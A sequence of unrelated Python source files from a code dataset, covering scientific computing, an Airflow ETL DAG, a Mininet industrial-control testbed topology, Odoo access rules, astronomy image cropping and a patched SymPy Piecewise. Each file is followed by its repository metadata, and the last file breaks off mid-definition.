ConeBand(alpha = np.pi/3, N=10**5):\n \n R = np.random.uniform(0,1,N)**(1/3)\n t = np.arccos(np.random.uniform(-1,1, N))\n p = np.random.uniform(0, 2*np.pi, N)\n\n x = R*np.cos(p)*np.sin(t)\n y = R*np.sin(p)*np.sin(t)\n z = R*np.cos(t)\n\n cones = (t < alpha) | (t > np.pi-alpha)\n\n conex = x[cones]; coney = y[cones]; conez = z[cones]; coner = R[cones]\n bandx = x[np.invert(cones)]; bandy = y[np.invert(cones)]; bandz = z[np.invert(cones)]; bandr = R[np.invert(cones)]\n \n return conex, coney, conez, bandx, bandy, bandz\n\n\ndef delta(r, t, p): \n return r*np.array([np.sin(t)*np.cos(p), np.sin(t)*np.sin(p),np.cos(t)]).reshape(1,3)\n\ndef InCone(pos, alpha = np.pi/3):\n \n # Unpack Cartesian\n x, y, z = pos.T\n \n # Compute distance from origin\n r = np.sqrt(x*x + y*y + z*z)\n \n # Compute angle wrt z-axis\n theta = np.arccos(z/r)\n \n # Check if incone\n incone = (theta <= alpha) | (theta >= (np.pi - alpha))\n \n # Also check if in sphere\n alsoinsphere = incone & (r < 1)\n \n return alsoinsphere.mean()\n\ndef InBand(pos, alpha = np.pi/3):\n \n # Unpack Cartesian\n x, y, z = pos.T\n \n # Compute distance from origin\n r = np.sqrt(x*x + y*y + z*z)\n \n # Compute angle wrt z-axis\n theta = np.arccos(z/r)\n \n # Check if inband\n inband = (theta >= alpha) & (theta <= (np.pi - alpha))\n \n # Also check if in sphere\n alsoinsphere = inband & (r < 1)\n \n return alsoinsphere.mean()\n \n\n#def fraction(r, t, p, alpha = np.pi/3, N=10**5):\ndef fraction(args):\n \n r, t, p, alpha, N = args\n\n from time import time \n start = time()\n \n conex, coney, conez, bandx, bandy, bandz = ConeBand(alpha, N=N)\n \n newcone = np.array([conex, coney, conez]).T + delta(r,t,p)\n newband = np.array([bandx, bandy, bandz]).T + delta(r,t,p)\n \n results = InCone(newcone, alpha), InBand(newband, alpha)\n \n return results\n\n\nif __name__ == \"__main__\":\n\n\n ds = np.linspace(0,2,100)\n ts = np.linspace(0,np.pi/2,100)\n args = [(d,t,0,np.pi/3, 10**7) for d in ds for t in ts]\n results = np.array(pqdm(args, fraction, 8))\n \n\n coneresults, bandresults = results.T\n coneresults = coneresults.reshape(len(ds),len(ts)).T\n bandresults = bandresults.reshape(len(ds),len(ts)).T\n\n np.save('ConeWeightFunction', coneresults)\n np.save('BandWeightFunction', bandresults)\n\n\n bandinterpolator = interp2d(ds, ts, bandresults)\n coneinterpolator = interp2d(ds, ts, coneresults)\n\n dmesh, tmesh = np.meshgrid(ds, ts)\n\n # Verify that the interpolating order is the same\n plt.figure(figsize=(16,8))\n plt.subplot(121)\n plt.imshow(coneresults, extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.subplot(122)\n plt.imshow(coneinterpolator(ds, ts), extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.savefig('coneweight.png')\n\n plt.figure(figsize=(16,8))\n plt.subplot(121)\n plt.imshow(bandresults, extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.subplot(122)\n plt.imshow(bandinterpolator(ds, ts), extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.savefig('bandweight.png')\n","repo_name":"alvarozamora/APkNNLinearTheory","sub_path":"GenerateConeBandInterpolator.py","file_name":"GenerateConeBandInterpolator.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10369959995","text":"\nimport time\nfrom pprint import pprint\n\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator, PythonVirtualenvOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.utils.dates import days_ago\nimport psycopg2\nfrom sqlalchemy import create_engine,Table, Column, Integer, String, MetaData,Date\nimport pandas as pd\n\nargs = {\n 'owner': 'airflow',\n}\n\nwith DAG(\n dag_id='DanaEstetieh',\n default_args=args,\n schedule_interval=None,\n start_date=days_ago(2),\n tags=['Q2DE'],\n) as dag:\n\n task1 = BashOperator(\n task_id='ExtractCSV',\n bash_command=\"pip install pymongo\",\n )\n\n def load_CSVfile(**kwargs):\n host=\"de_postgres\" \n database=\"psql_data_environment\"\n user=\"psql_user\"\n password=\"psql\"\n port='5432'\n engine = create_engine(f'postgresql://{user}:{password}@{host}:{port}/{database}')\n tablename=\"client_list\"\n rdf = pd.read_sql_table(\n tablename,\n con=engine\n )\n import json\n jsonfile=rdf.to_json(orient='records')\n with open('data.json', 'w') as file:\n json.dump(jsonfile, file)\n return 'Success'\n\n task2 = PythonOperator(\n task_id='load_CSVfile',\n python_callable=load_CSVfile,\n )\n def load_mongodb(**kwargs):\n from pymongo import MongoClient\n import json\n\n client = MongoClient(\"mongodb://mongopsql:mongo@de_mongo:27017\")\n\n db = client[\"DE\"]\n\n Collection = db[\"dataset\"]\n\n with open('data.json') as file:\n file_data = json.load(file)\n listfile=json.loads(file_data)\n Collection.insert_many(listfile)\n\n return 'Success'\n\n task3 = PythonOperator(\n task_id='load_mongodb',\n python_callable=load_mongodb,\n )\n task1 >> task2 \n task2 >> task3","repo_name":"Danaestetieh/DE_Assigment1","sub_path":"DEQ2.py","file_name":"DEQ2.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2209479236","text":"import codewars_test as test\nfrom solution import balanced_parens\n\n@test.describe(\"Fixed Tests\")\ndef fixed_tests():\n @test.it('Basic Test Cases')\n def ff():\n for n,exp in [ [0, [\"\"]],\n [1, [\"()\"]],\n [2, [\"(())\",\"()()\"]],\n [3, [\"((()))\",\"(()())\",\"(())()\",\"()(())\",\"()()()\"]]]:\n actual = balanced_parens(n)\n actual.sort()\n test.assert_equals(actual, exp)","repo_name":"oko-ha/codewars","sub_path":"All Balanced Parentheses/test_case.py","file_name":"test_case.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31718504858","text":"\"\"\"\nswat-s1 topology\n\"\"\"\n\nfrom mininet.topo import Topo\n\nfrom utils import IP, MAC, NETMASK\n\n\nclass SwatTopo(Topo):\n\n \"\"\"SWaT 3 plcs + attacker + private dirs.\"\"\"\n\n def build(self):\n\n switch = self.addSwitch('s1')\n\n plc1 = self.addHost(\n 'plc1',\n ip=IP['plc1'] + NETMASK,\n mac=MAC['plc1'])\n self.addLink(plc1, switch)\n\n plc2 = self.addHost(\n 'plc2',\n ip=IP['plc2'] + NETMASK,\n mac=MAC['plc2'])\n self.addLink(plc2, switch)\n\n plc3 = self.addHost(\n 'plc3',\n ip=IP['plc3'] + NETMASK,\n mac=MAC['plc3'])\n self.addLink(plc3, switch)\n\n attacker = self.addHost(\n 'attacker',\n ip=IP['attacker'] + NETMASK,\n mac=MAC['attacker'])\n self.addLink(attacker, switch)\n","repo_name":"scy-phy/minicps","sub_path":"examples/swat-s1/topo.py","file_name":"topo.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"73"} +{"seq_id":"72188558317","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\n# lon0, lat0 = 35.650798, 139.779477\nlon0, lat0 = 38.721527, 141.092104\nr = 6378.137*1000\ndata_path='data_6_16_2.csv'\ndata = pd.read_csv(data_path, names=['RSSI','LONGITUDE', 'LATITUDE'], sep=',')\n\ndata['DISTANCE'] = r*np.arccos(np.sin(lat0*np.pi/180)*np.sin(data['LATITUDE']*np.pi/180)+np.cos(lat0*np.pi/180)*np.cos(data['LATITUDE']*np.pi/180)*np.cos(lon0*np.pi/180-data['LONGITUDE']*np.pi/180))\n\nx=data[['DISTANCE']]\ny=data[['RSSI']]\n\ndef func(x, a, b):\n return a + b * np.log10(x)\n\ndef func_theory(x):\n return 13 - 20*np.log10(4*np.pi*x*921.2*10**6/299792458)\n\nx = x.to_numpy()[:, 0]\ny = y.to_numpy()[:, 0]\n\ny_theory = func_theory(x)\n\npopt, pcov = curve_fit(func,x,y) \nprint(\"y=\"+str(popt[0])+str(popt[1])+\"*log10(x)\")\ny_pred = func(x, popt[0], popt[1])\nplt.plot(x,y_pred,color=\"red\")\nplt.plot(x,y_theory,color=\"green\")\n\nplt.scatter(x,y)\nplt.xlabel(\"Distance from Tx(m)\")\nplt.ylabel(\"RSSI(dBm)\")\nplt.gca().get_xaxis().get_major_formatter().set_useOffset(False)\n# plt.legend([\"simulation\",\"measured value\",\"linear regression of measured value\"])\nplt.legend([\"fit curve\",\"theoretical value\",\"linear regression of measured value\"])\nprint(\"-122dBm at \"+str(int(np.exp((-122+57.035530363980186)/(-9.009988560782537))))+\"m\")\nprint(\"-132dBm at \"+str(int(np.exp((-132+57.035530363980186)/(-9.009988560782537))))+\"m\")","repo_name":"kazuyahirotsu/LoRa","sub_path":"project/GPS-visualization-Python/rssi_plot_scipy.py","file_name":"rssi_plot_scipy.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"37147247655","text":"import os\nfrom datetime import datetime\nimport csv\nimport re\nproetos = [\n \"Appium\"\n ,\"Bundler\"\n ,\"Candlepin\"\n ,\"Diaspora\"\n ,\"Hazelcast\"\n ,\"Kuma\"\n ,\"Marathon\"\n ,\"Metasploit Framework\"\n ,\"Meteor\"\n ,\"Nancy\"\n ,\"Netty\"\n ,\"Node\"\n ,\"Okhttp\"\n ,\"Pouchdb\"\n ,\"Pulp\"\n ,\"Rosdistro\"\n ,\"Scala IDE\"\n ,\"Scala JS\"\n ,\"Scikit\"\n ,\"Vagrant\"\n]\natributos = [\n\"created_at_week_day\"\n,\"created_at_day_turn\"\n,\"conflict\"\n,\"forward_links\"\n,\"intra_branch\"\n,\"description_length\"\n,\"num_commits\"\n,\"files_added\"\n,\"files_deleted\"\n,\"files_modified\"\n,\"files_changed\"\n,\"src_files\"\n,\"doc_files\"\n,\"other_files\"\n,\"src_churn\"\n,\"test_churn\"\n,\"new_entropy\"\n,\"entropy_diff\"\n,\"commits_on_files_touched\"\n,\"commits_to_hottest_file\"\n,\"hotness\"\n,\"at_mentions_description\"\n,\"at_mentions_comments\"\n,\"prev_pull_reqs_project\"\n,\"project_succ_rate\"\n,\"perc_external_contribs\"\n,\"sloc\"\n,\"test_lines_per_kloc\"\n,\"test_cases_per_kloc\"\n,\"asserts_per_kloc\"\n,\"stars\"\n,\"team_size\"\n,\"project_age\"\n,\"workload\"\n,\"ci\"\n,\"requester\"\n,\"prev_pullreqs\"\n,\"requester_succ_rate\"\n,\"followers\"\n,\"following\"\n,\"requester_age\"\n,\"main_team_member\"\n,\"watcher_project\"\n,\"req_follows_integrator\"\n,\"integrator_follows_req\"\n,\"prior_interaction_issue_events\"\n,\"prior_interaction_issue_comments\"\n,\"prior_interaction_pr_events\"\n,\"prior_interaction_pr_comments\"\n,\"prior_interaction_commits\"\n,\"prior_interaction_commit_comments\"\n,\"first_response\"\n]\n\ndef pegaValor(elem):\n return elem[0]\n \ndef printBest(lista):\n print(\"15 melhohres: \")\n for i in range(0,15):\n print(atributos.index(lista[i][1])+1, end=\", \")\n \nfile = open(\"resultados.csv\", \"r\",newline='')\ncsvFile = csv.reader(file, delimiter=';')\n# matriz = []\n# for registro in csvFile:\nregistros = []\nfor linha in csvFile:\n registro = []\n for i in range(0,52):\n registro.append((float(linha[i]),atributos[i]))\n registros.append(registro)\n \nfor j in range(14,20):\n registros[j].sort(reverse=True,key=pegaValor)\n print(str(proetos[j])+\":\")\n for i in range(0,52):\n print(str(i+1)+\" possição: \"+str(atributos.index(registros[j][i][1])+1)+\", nome: \"+str(registros[j][i][1])+\", valor: \"+str(registros[j][i][0]))\n print()\n printBest(registros[j])\n \n\n","repo_name":"mscmateus/tcc","sub_path":"TCC/experimentos3/scripts/best.py","file_name":"best.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1913035854","text":"from spack.package import *\n\n\nclass PyJarowinkler(PythonPackage):\n \"\"\"library for fast approximate string matching using Jaro and Jaro-Winkler similarity.\"\"\"\n\n homepage = \"https://github.com/maxbachmann/JaroWinkler\"\n pypi = \"jarowinkler/jarowinkler-1.2.3.tar.gz\"\n\n maintainers(\"LydDeb\")\n\n version(\"1.2.3\", sha256=\"af28ea284cfbd1b21b29ff94b759f20e94e4f7c06f424b0b4702e701c2a21668\")\n\n depends_on(\"py-setuptools@42:\", type=\"build\")\n depends_on(\"py-scikit-build@0.15.0\", type=\"build\")\n depends_on(\"py-rapidfuzz-capi@1.0.5\", type=\"build\")\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-jarowinkler/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"27536585045","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom odoo import api, fields, models\n\n_logger = logging.getLogger(__name__)\n\n\nclass InheritedResUsers(models.Model):\n _inherit = \"res.users\"\n\n default_shipping = fields.Selection(\n [\n (\"many\", \"Deliver products many times\"),\n (\"one\", \"Deliver all products at once\"),\n ],\n string=\"Default Shipping Progress\",\n default=\"one\",\n )\n sale_authorization_ids = fields.One2many(comodel_name='res.users.sale.authorization',\n inverse_name='res_user_id')\n stock_authorization_ids = fields.One2many(comodel_name='res.users.stock.authorization',\n inverse_name='res_user_id')\n\n @api.multi\n def write(self, values):\n super(InheritedResUsers, self).write(values)\n # clear caches linked to the users\n self.env['ir.model.access'].call_cache_clearing_methods()\n self.env['ir.rule'].clear_caches()\n self.has_group.clear_cache(self)\n\n def get_authorized_sa_owner(self):\n owner_list = [False, self.id]\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules:\n for owner in rules[0].owner_ids:\n owner_list.append(owner.id)\n return owner_list\n\n def get_authorized_sa_partner(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_authorized_so_owner(self):\n owner_list = [False, self.id]\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules:\n for owner in rules[0].owner_ids:\n owner_list.append(owner.id)\n return owner_list\n\n def get_authorized_so_partner(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_authorized_sa_owner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules and rules[0].owner_ids:\n owner_list = rules[0].owner_ids.ids\n else:\n owner_list = self.env['res.users'].sudo().search([]).ids\n return owner_list\n\n def get_authorized_sa_partner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_authorized_so_owner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules and rules[0].owner_ids:\n owner_list = rules[0].owner_ids.ids\n else:\n owner_list = self.env['res.users'].sudo().search([]).ids\n return owner_list\n\n def get_authorized_so_partner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_stock_authorized(self):\n stock_picking_type_list = []\n rules = self.stock_authorization_ids\n if rules:\n for rule in rules:\n stock_picking_type_list.extend(rule.stock_picking_type_ids.ids)\n else:\n stock_picking_type_list = self.env['stock.picking.type'].sudo().search([]).ids\n return stock_picking_type_list\n\n\nclass ResUsersSaleAuthorization(models.Model):\n _name = \"res.users.sale.authorization\"\n _description = \"Sale Authorization\"\n\n res_user_id = fields.Many2one(comodel_name='res.users')\n document_type = fields.Selection([\n ('sale_agreement', 'Sale Agreement'),\n ('sale_order', 'Sale Order'),\n ],\n required=True,\n string='Document Type'\n )\n owner_ids = fields.Many2many('res.users', 'sale_authorization_res_user_rel', 'sale_authorization_id',\n 'owner_id', string='Owner')\n partner_ids = fields.Many2many('res.partner', 'sale_authorization_res_partner_rel',\n 'sale_authorization_id', 'partner_id',\n domain=[('parent_id', '=', False)],\n string='Partner')\n\n\nclass ResUsersStockAuthorization(models.Model):\n _name = \"res.users.stock.authorization\"\n _description = \"Stock Authorization\"\n\n res_user_id = fields.Many2one(comodel_name='res.users')\n\n stock_warehouse_id = fields.Many2one('stock.warehouse', required=True, string='Warehouse')\n stock_picking_type_ids = fields.Many2many('stock.picking.type', 'stock_authorization_stock_picking_type_rel',\n 'stock_authorization_id', 'stock_picking_type_id',\n string='Stock Picking Type')\n","repo_name":"nguyenvu16102001/ndtl","sub_path":"sit_addons/ndtl_contacts/models/inherited_res_users.py","file_name":"inherited_res_users.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33487949197","text":"from BaseModel import BaseModel\nimport re\n\n\nclass UrlModel(BaseModel):\n\n def __init__(self):\n super(UrlModel, self).__init__()\n\n # this is Django's url regex\n self.__url_regex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n def generate_confidence(self, preceding_stripes, slot_values, following_stripes):\n\n matches = [z for z in slot_values if re.search(self.__url_regex, z) is not None]\n\n confidence = float(len([z for z in matches if z[1]])) / float(len(slot_values))\n\n return confidence\n","repo_name":"inferlink/landmark-rest","sub_path":"landmarkrest/field_predictor/field_models/UrlModel.py","file_name":"UrlModel.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"25058008287","text":"'''\n NAME: auto_crop_fits\n\n DESCRIPTION: Automatically crops a folder of FITS files, given a list \n of center coordinates and a list of radii. \n \t\t\t\t\tUses Pyraf. \n\n EXECUTION COMMAND: \n python auto_crop_fits.py\n\n INPUTS: Files: X.XXXGyr.fit\n where X.XXXGyr denotes the time of the snapshot. \n all_centers.txt \n The output of get_center.py; 3 columns (name \n of file without .fit(s) extension, x-coord,\n y-coord)\n r_max.txt \n A list of radii for all .fit(s) files in \n all_centers.txt, in the same order. \n\n OUTPUTS: Files: X.XXXGyr_crop.fit \n\n NOTES: Change the input & output file names, etc., as needed. \n May be modified to work with a list of original image\n dimensions or read them individually from original \n image FITS headers. \n May be modified to check that dimensions of cropped\n image do not exceed those of original. \n \t\t\t\t\t\n REVISION HISTORY: Written by J.E. Berlanga Medina. \n Last edited June 22, 2014. \n\n\n'''\n\n# ----------------- Code begins here -------------------\n\n#!/usr/bin/env python\n\nimport numpy\nfrom pyraf import iraf \nimport sys\n\n\n# Grab the data from all_centers.txt. \nfits_images_to_crop = numpy.loadtxt(\"all_centers.txt\", dtype='S', usecols=(0,))\norig_x_center, orig_y_center = numpy.loadtxt(\"all_centers.txt\", usecols=(1,2), unpack=True)\n\n# Grab the data from r_max.txt.\nr_max_radii = numpy.loadtxt(\"r_max.txt\", usecols=(0,))\n\n# Check that the lengths of all_centers.txt & r_max.txt are the same.\nif len(fits_images_to_crop) != len(r_max_radii):\n print(\"\\n\")\n print(\"all_centers.txt & r_max.txt don't have the same number of rows.\")\n print(\"Re-check your data. You can do this from a Unix terminal with: cat | wc -l\")\n sys.exit()\n# End of loop. \n\n# Crop all images. \nfor i in range(0,len(fits_images_to_crop)):\n #print(\"image name: \"+str(fits_images_to_crop[i][0:8]))\n low_crop_x = int(orig_x_center[i] - r_max_radii[i])\n #print(\"low_crop_x: \"+str(low_crop_x))\n high_crop_x = int(orig_x_center[i] + r_max_radii[i])\n #print(\"high_crop_x: \"+str(high_crop_x))\n low_crop_y = int(orig_y_center[i] - r_max_radii[i])\n #print(\"low_crop_y: \"+str(low_crop_y))\n high_crop_y = int(orig_y_center[i] + r_max_radii[i])\n #print(\"high_crop_y: \"+str(high_crop_y))\n iraf.imcopy.input=str(fits_images_to_crop[i][0:8])+\".fit[\"+str(low_crop_x)+\":\"+str(high_crop_x)+\",\"+str(low_crop_y)+\":\"+str(high_crop_y)+\"]\"\n iraf.imcopy.output=str(fits_images_to_crop[i][0:8])+\"_crop.fit\"\n iraf.imcopy()\n# End of loop.\n\n\n# ----------------- End of code ----------------------","repo_name":"AGES-UARK/2dfft_utils","sub_path":"2dfft_utils/misc/auto_crop_fits.py","file_name":"auto_crop_fits.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"22498540617","text":"\"\"\"\nCopied from Piecewise SymPy. The only modification is in `piecewise_eval` where\n\n```\n for e, c in _args:\n if not c.is_Atom and not isinstance(c, Relational):\n free = c.free_symbols\n```\n\nis changed to\n\n```\n for e, c in _args:\n if not c.is_Atom and not isinstance(c, Relational):\n free = c.expr_free_symbols\n```\n\nSee the following links:\nhttps://github.com/sympy/sympy/issues/14933\nhttps://github.com/pycalphad/pycalphad/pull/180\n\n\"\"\"\n\nimport sympy.functions.elementary.piecewise\nfrom sympy.core import S, Function, Dummy, Tuple\nfrom sympy.core.basic import as_Basic\nfrom sympy.core.relational import Relational, _canonical\nfrom sympy.logic.boolalg import And, Boolean, distribute_and_over_or, Or, true, false\nfrom sympy.utilities.misc import filldedent, func_name\n\n# Removes ITE rewriting, which is not compatible with SymEngine\ndef exprcondpair_new(cls, expr, cond):\n expr = as_Basic(expr)\n if cond == True:\n return Tuple.__new__(cls, expr, true)\n elif cond == False:\n return Tuple.__new__(cls, expr, false)\n\n if not isinstance(cond, Boolean):\n raise TypeError(filldedent('''\n Second argument must be a Boolean,\n not `%s`''' % func_name(cond)))\n return Tuple.__new__(cls, expr, cond)\n\ndef piecewise_eval(cls, *_args):\n if not _args:\n return\n\n if len(_args) == 1 and _args[0][-1] == True:\n return _args[0][0]\n\n newargs = [] # the unevaluated conditions\n current_cond = set() # the conditions up to a given e, c pair\n # make conditions canonical\n args = []\n for e, c in _args:\n if not c.is_Atom and not isinstance(c, Relational):\n free = c.expr_free_symbols\n if len(free) == 1:\n funcs = [i for i in c.atoms(Function)\n if not isinstance(i, Boolean)]\n if len(funcs) == 1 and len(\n c.xreplace({list(funcs)[0]: Dummy()}\n ).free_symbols) == 1:\n # we can treat function like a symbol\n free = funcs\n _c = c\n x = free.pop()\n try:\n c = c.as_set().as_relational(x)\n except NotImplementedError:\n pass\n else:\n reps = {}\n for i in c.atoms(Relational):\n ic = i.canonical\n if ic.rhs in (S.Infinity, S.NegativeInfinity):\n if not _c.has(ic.rhs):\n # don't accept introduction of\n # new Relationals with +/-oo\n reps[i] = S.true\n elif ('=' not in ic.rel_op and\n c.xreplace({x: i.rhs}) !=\n _c.xreplace({x: i.rhs})):\n reps[i] = Relational(\n i.lhs, i.rhs, i.rel_op + '=')\n c = c.xreplace(reps)\n args.append((e, _canonical(c)))\n\n for expr, cond in args:\n # Check here if expr is a Piecewise and collapse if one of\n # the conds in expr matches cond. This allows the collapsing\n # of Piecewise((Piecewise((x,x<0)),x<0)) to Piecewise((x,x<0)).\n # This is important when using piecewise_fold to simplify\n # multiple Piecewise instances having the same conds.\n # Eventually, this code should be able to collapse Piecewise's\n # having different intervals, but this will probably require\n # using the new assumptions.\n if isinstance(expr, sympy.functions.elementary.piecewise.Piecewise):\n unmatching = []\n for i, (e, c) in enumerate(expr.args):\n if c in current_cond:\n # this would already have triggered\n continue\n if c == cond:\n if c != True:\n # nothing past this condition will ever\n # trigger and only those args before this\n # that didn't match a previous condition\n # could possibly trigger\n if unmatching:\n expr = sympy.functions.elementary.piecewise.Piecewise(*(\n unmatching + [(e, c)]))\n else:\n expr = e\n break\n else:\n unmatching.append((e, c))\n\n # check for condition repeats\n got = False\n # -- if an And contains a condition that was\n # already encountered, then the And will be\n # False: if the previous condition was False\n # then the And will be False and if the previous\n # condition is True then then we wouldn't get to\n # this point. In either case, we can skip this condition.\n for i in ([cond] +\n (list(cond.args) if isinstance(cond, And) else\n [])):\n if i in current_cond:\n got = True\n break\n if got:\n continue\n\n # -- if not(c) is already in current_cond then c is\n # a redundant condition in an And. This does not\n # apply to Or, however: (e1, c), (e2, Or(~c, d))\n # is not (e1, c), (e2, d) because if c and d are\n # both False this would give no results when the\n # true answer should be (e2, True)\n if isinstance(cond, And):\n nonredundant = []\n for c in cond.args:\n if (isinstance(c, Relational) and\n (~c).canonical in current_cond):\n continue\n nonredundant.append(c)\n cond = cond.func(*nonredundant)\n elif isinstance(cond, Relational):\n if (~cond).canonical in current_cond:\n cond = S.true\n\n current_cond.add(cond)\n\n # collect successive e,c pairs when exprs or cond match\n if newargs:\n if newargs[-1].expr == expr:\n orcond = Or(cond, newargs[-1].cond)\n if isinstance(orcond, (And, Or)):\n orcond = distribute_and_over_or(orcond)\n newargs[-1] = sympy.functions.elementary.piecewise.ExprCondPair(expr, orcond)\n continue\n elif newargs[-1].cond == cond:\n orexpr = Or(expr, newargs[-1].expr)\n if isinstance(orexpr, (And, Or)):\n orexpr = distribute_and_over_or(orexpr)\n newargs[-1] = sympy.functions.elementary.piecewise.ExprCondPair(orexpr, cond)\n continue\n\n newargs.append(sympy.functions.elementary.piecewise.ExprCondPair(expr, cond))\n\n # some conditions may have been redundant\n missing = len(newargs) != len(_args)\n # some conditions may have changed\n same = all(a == b for a, b in zip(newargs, _args))\n # if either change happened we return the expr with the\n # updated args\n if not newargs:\n raise ValueError(filldedent('''\n There are no conditions (or none that\n are not trivially false) to define an\n expression.'''))\n if missing or not same:\n return cls(*newargs)\n","repo_name":"HUISUN24/pycalphad","sub_path":"pycalphad/core/patched_piecewise.py","file_name":"patched_piecewise.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5709873939","text":"import pandas as pd\nimport plotly.express as px\nfrom dash import dcc, html, Dash\nfrom dash.dependencies import Input, Output, State\nfrom dash_visualization import ids, data_extraction, main\nimport numpy as np\n\n\ndef load_aggregated_load_profiles():\n all_load_profiles = pd.DataFrame()\n for country in main.COUNTRIES:\n for year in main.YEARS:\n try:\n ref_load, sems_load = main.LoadProfileAnalyser(f\"D5.4_{country}_{year}\", country, year).load_aggregated_load_profiles()\n ref_load.columns = [\"price ID\", \"reference\"]\n sems_load.columns = [\"price ID\", \"optimization\"]\n df = pd.concat([ref_load, sems_load.drop(columns=[\"price ID\"])], axis=1)\n melted = df.melt(value_vars=[\"reference\", \"optimization\"], id_vars=\"price ID\", var_name=\"mode\", value_name=\"Load (GW)\")\n melted[\"country\"] = country\n melted[\"year\"] = year\n melted[\"hour\"] = np.hstack((np.arange(8760), np.arange(8760)))\n all_load_profiles = pd.concat([all_load_profiles, melted], axis=0)\n except:\n print(f\"Load profiles for {country} {year} could not be loaded\")\n return all_load_profiles.reset_index(drop=True)\n\n\nALL_LOAD_PROFILES = load_aggregated_load_profiles()\n\n\n\ndef plot_aggregated_load_profiles(app: Dash) -> html.Div:\n n_rows = len(list(ALL_LOAD_PROFILES[\"year\"].unique()))\n fig = px.line(\n data_frame=ALL_LOAD_PROFILES,\n x=\"hour\",\n y=\"Load (GW)\",\n color=\"country\",\n facet_row=\"year\",\n line_dash=\"mode\",\n width=1_200,\n height=300*n_rows\n )\n return html.Div(dcc.Graph(figure=fig), id=ids.AGGREGATED_LOAD_PROFILE_CHART)\n\n\n\n\nif __name__ == \"__main__\":\n load_aggregated_load_profiles()\n\n","repo_name":"H2020-newTRENDs/FLEX","sub_path":"dash_visualization/aggregated_load_profile_figure.py","file_name":"aggregated_load_profile_figure.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"73"} +{"seq_id":"35705006768","text":"# Database utilities\n\nfrom sqlalchemy import create_engine, Table, Column, MetaData, Integer, String, ForeignKey, Boolean\nfrom sqlalchemy.sql import select, func\nfrom sqlalchemy.orm import sessionmaker\nimport threading\n\n\nclass Database(object):\n\n def __init__(self, dbpath):\n self._lock = threading.Lock()\n\n with(self._lock):\n engine = create_engine('sqlite:///'+dbpath,\n connect_args={'check_same_thread':False})\n self._session = sessionmaker(bind=engine, autocommit = False)() \n metadata = MetaData()\n \n self._blueprints = Table('Blueprints', metadata,\n Column('id', Integer, unique=True, primary_key=True),\n Column('cloudify_id', String),\n Column('description', String),\n Column('binder', String),\n Column('binder_config', String)\n )\n \n self._deployments = Table('Deployments', metadata,\n Column('deployment_id', String, 